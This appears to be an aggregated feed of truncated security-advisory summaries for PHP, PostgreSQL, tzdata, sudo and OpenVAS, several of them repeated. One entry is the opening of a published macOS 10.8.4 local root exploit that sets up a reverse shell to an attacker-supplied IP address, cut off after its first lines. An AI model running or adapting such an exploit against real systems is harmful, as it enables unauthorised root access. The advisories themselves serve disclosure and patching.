SUSE-SU-2016:2414-1 Security update for postgresql93

This update for postgresql93 to version 9.3.14 fixes the several issues. These security issues were fixed: - CVE-2016-5423: CASE/WHEN with inlining can cause untrusted pointer dereference bsc993454. - CVE-2016-5424: Fix client programs' handling of special characters in database and role names...

MGASA-2016-0267 Updated php/xmlrpc-epi/timezone packages fix security vulnerability

Stack-based buffer overflow vulnerability in virtualfileex CVE-2016-6289. Use After Free in unserialize with Unexpected Session Deserialization CVE-2016-6290. Out of bound read in exifprocessIFDinMAKERNOTE CVE-2016-6291. NULL Pointer Dereference in exifprocessusercomment CVE-2016-6292...

Updated php/xmlrpc-epi/timezone packages fix security vulnerability

Stack-based buffer overflow vulnerability in virtualfileex CVE-2016-6289. Use After Free in unserialize with Unexpected Session Deserialization CVE-2016-6290. Out of bound read in exifprocessIFDinMAKERNOTE CVE-2016-6291. NULL Pointer Dereference in exifprocessusercomment CVE-2016-6292...

Scientific Linux Security Update : tzdata bug fix update on SL5.x, SL6.x i386/x86_64 (20160621)

This update fixes the following bugs : - In 2015, Egypt did not observe Daylight Savings Time DST. However, in 2016, Egypt observes DST from July 7 at 24:00 to October 27 at 24:00. As a consequence of this change, the tzdata package had incorrect data regarding DST in Egypt in 2016. This has been...

Updated php/timezone/php-timezonedb packages fix security vulnerability

The php package has been updated to version 5.6.19, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. The timezone information in the timezone and php-timezonedb packages has also been updated to the latest, version 2016a...

MGASA-2016-0110 Updated php/timezone/php-timezonedb packages fix security vulnerability

The php package has been updated to version 5.6.19, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. The timezone information in the timezone and php-timezonedb packages has also been updated to the latest, version 2016a...

php: Security update (7 CVEs)

The php package has been rebuilt and was uploaded to the Chaos Calmer 15.05 repository due to multiple security issues. VERSION 5.6.8-1 = 5.6.17-1 CHANGELOG Sun, 24 Jan 2016 21:47:52 +0100 18d121b Update to 5.6.17 Fixes CVE-2016-1903. Wed, 23 Dec 2015 16:00:14 -0500 766cfcc Update to 5.6.16 Wed, ...

JShielder - LAMP/LEMP Secure Deployment

JSHielder is an Open Source tool developed to help SysAdmin and developers secure there Linux Servers in which they will be deploying any web application. This tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server with little...

DLA-328-1 tzdata - new upstream version

Bulletin has no description...

SUSE: Security Advisory for PHP (SUSE-SU-2015:1265-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

SUSE-SU-2015:1253-2 Security update for php5

This security update of PHP fixes the following issues: Security issues fixed: CVE-2015-4024 bnc931421: Fixed multipart/form-data remote DOS Vulnerability. CVE-2015-4026 bnc931776: pcntlexec did not check path validity. CVE-2015-4022 bnc931772: Fixed and overflow in ftpgenlist that resulted in a...

The vulnerability of the SUSE Linux Enterprise operating system allows attackers to compromise the confidentiality of protected information.

The vulnerability of the SUSE Linux Enterprise operating system’s timezone package can lead to a violation of the confidentiality of protected information. Exploitation of this vulnerability can be carried out remotely...

[SECURITY] [DLA 179-1] tzdata new upstream version

Package : tzdata Version : 2015b-0squeeze1 Upstream published version 2015b. Changes since 2014h-0squeeze1 currently in squeeze-lts are the following: - New leap second 2015-06-30 23:59:60 UTC. - New DST for Mongolia. - New DST for Palestine. - New DST for Cancun Mexico. - New DST for Chile. - Ne...

DLA-179-1 tzdata - new upstream version

Bulletin has no description...

USN-2533-1 sudo vulnerability

Jakub Wilk and Stephane Chazelas discovered that Sudo incorrectly handled the TZ environment variable. An attacker with Sudo access could possibly use this issue to open arbitrary files, bypassing intended permissions...

UBUNTU-CVE-2015-0273

Multiple use-after-free vulnerabilities in ext/date/phpdate.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 allow remote attackers to execute arbitrary code via crafted serialized input containing a 1 R or 2 r type specifier in a DateTimeZone data handled by the...

Updated openvas-manager packages fix security vulnerability

Updated openvas-manager packages fixes security vulnerability: It has been identified that OpenVAS Manager before 4.0.6 is vulnerable to sql injections due to a improper handling of the timezone parameter in modifyschedule OMP command. It has been identified that this vulnerability may allow...

OSX-10.8.4-Local-Root-

Exploit Title: OSX 10.8.4 Local Root Priv Escalation Root Reverse Shell Date: 08-27-2013 Exploit Author: David Kennedy TrustedSec Website: https://www.trustedsec.com Tested On: OSX 10.8.4 import subprocess IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1"...

Sql injection

SQL injection vulnerability in OpenVAS Manager before 4.0.6 and 5.x before 5.0.7 allows remote attackers to execute arbitrary SQL commands via the timezone parameter in a modifyschedule OMP command...

CVE-2014-9220

SQL injection vulnerability in OpenVAS Manager before 4.0.6 and 5.x before 5.0.7 allows remote attackers to execute arbitrary SQL commands via the timezone parameter in a modifyschedule OMP command...